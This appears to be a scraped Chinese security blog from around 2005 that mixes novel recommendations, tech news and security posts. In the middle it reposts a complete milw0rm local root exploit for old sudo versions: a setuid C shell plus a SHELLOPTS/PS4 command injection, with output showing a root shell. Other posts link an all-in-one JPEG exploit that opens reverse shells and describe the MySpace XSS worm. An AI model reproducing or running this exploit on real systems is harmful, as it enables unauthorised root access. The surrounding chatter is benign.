This IE addon was just released and is sweet for web-app testing.  I’ve been finding a lot of issues like XSS in a web-apps use of the DOM lately, and this tool fully exposes the DOM with an easy to navigate interface.  Nice for devs and security testers.
 
http://www.microsoft.com/downloads/details.aspx?FamilyID=e59c3964-672d-4511-bb3e-2d5e1db91038&displaylang=en

听大鹰说的,应该在本月内

呵呵,期待啊!

不知道这次whitecell又会给我们带来什么新气象?~~

强烈推荐孙晓的英雄志

两三年前看的

这个千古第一大坑最近终于有要填完的趋势

作者这本书写了10多年,思想深刻,文字功底也很不错,与金古的风格不同,另辟奚径.

当年通宵一口气读完,然后就开始一年一集的等

很多太监书我看过后就不再关注了

唯有英雄志,是我一直关注的东西,呵呵

喜欢武侠的朋友一定要看,不喜欢武侠的朋友也推荐看看,也许你从此喜欢上了武侠也说不定.

昨天下午两点发布的

以后全力发展搜索引擎,新的界面风格简洁,很不错

赞一个

新域名  http://www.yahoo.com.cn

一搜和一拍都会消失

## Sudo local root escalation privilege ##

## vuln versions :  sudo < 1.6.8p10

## by breno



## You need sudo access execution for some bash script ##

## Use csh shell to change SHELLOPTS env ##



ie:

       %cat x.sh

       #!/bin/bash -x



       echo "Getting root!!"

       %

##



##

       # cat /etc/sudoers

       ...

       breno   ALL=(ALL) /home/breno/x.sh

       ..

       #



## Let's use an egg shell

       %cat egg.c



#include <stdio.h>



       int main()

       {

       setuid(0);

       system("/bin/sh");

}

%



% gcc -o egg egg.c

% setenv SHELLOPTS xtrace

% setenv PS4 '$(chown root:root egg)'

% sudo ./x.sh

echo Getting root!!

Getting root!!

% ls -lisa egg

1198941 8 -rwxr-xr-x  1 root root 7428 2005-11-09 13:54 egg

% setenv PS4 '$(chmod +s egg)'

% sudo ./x.sh

echo Getting root!!

Getting root!!

% ./egg

sh-3.00# id

uid=0(root) gid=1000(breno) egid=0(root) grupos=7(lp),102(lpadmin),1000(breno)

sh-3.00#



# milw0rm.com [2005-11-09]


#在redhat as 4.02 上测试成功

#在redhat redora core4 下也测试成功,呵呵

#苛刻一点的条件就是该用户必须是sudo的用户才行~~~唉~~


魔法学徒,魔盗,魔武士  这三部都已经完结

听说还要写两部魔法的,其中有个好象是魔法商人之类,总共凑成5部

他的作品我挺喜欢的,在网络写手里他应该算是才子了!

这个漏洞是2004年出来的了

http://www.securityfocus.com/bid/11173/exploit/

关于漏洞的利用有很多exploit,很多是crash的

最后有一个是 allinone的,包括了添加ADMIN帐号,绑定端口,反向连接,下载木马等功能
http://www.milw0rm.org/id.php?id=556

关于这个漏洞,Andrey Bayora写了篇非常棒的文章.这个家伙是苏联人,现在在以色列的一家顶级金融机构从事安全工作.

这片文章写的非常棒,详细分析了漏洞的起因经过结果,并且给出了一个非常详细的攻击过程,通过发送EMAIL,通过社交工程学骗取打开附件,在内网个人用户机器上,执行shellcode,反向连接出来,再中上sniffer什么的东西.这是一次非常典型的渗透过程.

这篇文章的地址是: http://www.securityelf.org/html/jpeg_exploit_variant/index.html

PDF版: http://www.securityelf.org/files/jpeg_exploit_variant.zip

他的个人主页: http://www.securityelf.org

改用linux桌面,FEDORA CORE 4 , KDE,优化,美化后还是蛮爽的.


主要是做事情方便,当然回家后打游戏还是要用windows,呵呵

不过我曾经在大学的时候把redhat 8 改装成了游戏机

用来打CS,魔兽,拳皇什么的,效果比我的WINDOWS还好,有兴趣的同学可以试试!

最近正在看不死传说，主角叫刘累，是个吸血鬼僵尸，没错，因为他既是吸血鬼又是僵尸。同时还是个修真。

同样是从东方打到西方，地球打到异空间，从修真打到魔法打到超能力，总之是个大杂烩。

和升龙道有些类似，不过作者显然没有血红坏的那么彻底，呵呵。我一直相信血红是最邪恶的家伙。

还好是个全本，文笔还可以忍受，消磨时间可以。

起点链接

攻击者通过XSS，修改了所有member的个人空间，很搞笑的给每个人都加了个samy is my hero,显示出他明显有自恋倾向。

myspace的页面做了很多过滤，攻击者用了很多方法，最终绕过了ids，修改了用户的profile，最终形成一个XSS Virus。

今天bugtraq上很是热烈的讨论着myspace被黑的事情。

攻击者还写了个攻击经过发布在互联网上，很是嚣张和搞笑的说着i never be caught

关于 XSS Virus

关于攻击myspace的过程和方法细节